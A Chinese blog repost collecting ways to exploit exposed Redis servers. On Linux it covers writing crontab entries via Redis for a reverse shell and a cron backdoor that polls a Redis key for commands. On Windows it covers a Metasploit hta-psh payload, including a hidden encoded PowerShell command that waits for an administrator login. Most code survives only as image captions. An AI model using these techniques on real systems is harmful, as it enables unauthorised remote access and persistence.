欢迎光临
我们一直在努力

redis利用姿势收集

Linux利用(转自wooyun)

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;

测试环境:CentOS,RHEL

# 利用crontab反弹shell

1-34 redis利用姿势收集

# 利用crontab创建文件 /tmp/888

1-34 redis利用姿势收集

1-34 redis利用姿势收集

# 二次改写crontab

1-34 redis利用姿势收集

# 利用第一步的写crontab步骤,完成下面的命令

1-34 redis利用姿势收集

控制 /var/spool/cron/root 和 /tmp/zz

# 最终实现,每10秒从redis的c变量读入要执行的命令,再将执行结果写入变量r

1-34 redis利用姿势收集

windows利用方式(转自90sec)

redis 官方未发布windows版本,但是野外存在redis/win版本。

在测试时发现一windows版本redis,遂开始搞。

直接上利用,基于msf:

1-34 redis利用姿势收集

hta-psh.txt 对一些字符串进行变通,如不,在写入时会导致字符串丢失。

1-34 redis利用姿势收集

修改1.ps1,文件内容大概如下:

$command=”powershell -nop -w hidden -e xxxxxxxxxxxxxxxx”;iex $command;$command2=”taskkill /im mshta.exe”;iex $command2;

最后写入文件,等待管理员登陆

1-34 redis利用姿势收集

1-34 redis利用姿势收集

【原文:redis利用姿势收集 MottoIN小编整理发布】

原创文章,作者:Rowei,如若转载,请注明出处:http://www.mottoin.com/84543.html

未经允许不得转载:杂术馆 » redis利用姿势收集
分享到: 更多 (0)